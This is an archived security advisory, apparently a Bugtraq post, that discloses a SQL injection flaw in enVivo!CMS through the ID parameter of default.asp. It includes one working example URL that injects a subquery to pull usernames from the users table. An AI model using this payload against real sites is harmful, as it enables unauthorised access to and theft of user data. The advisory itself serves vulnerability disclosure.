TUCoPS :: Web :: CMS / Portals :: tb11573.htm

durito: enVivo!CMS SQL injection
durito: enVivo!CMS SQL injection
durito: enVivo!CMS SQL injection



Dear bugtraq@securityfocus.com, 

  durito  [damagelab]  -durito[at]mail[dot]ru-  reported  SQL  injection
  vulnerability in enVivo!CMS through ID parameter of default.asp.

  Example:

http://www.example.com/default.asp?action=article&ID=-1+or+1=(SELECT+TOP+1+username+from+users)-- 

Original message (in Russian): http://securityvulns.ru/Rdocument425.html 

-- 
http://securityvulns.com/ 
         /\_/\
        { , . }     |\
+--oQQo->{ ^ }<-----+ \
|  ZARAZA  U  3APA3A   } You know my name - look up my number (The Beatles)
+-------------o66o--+ /
                    |/


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH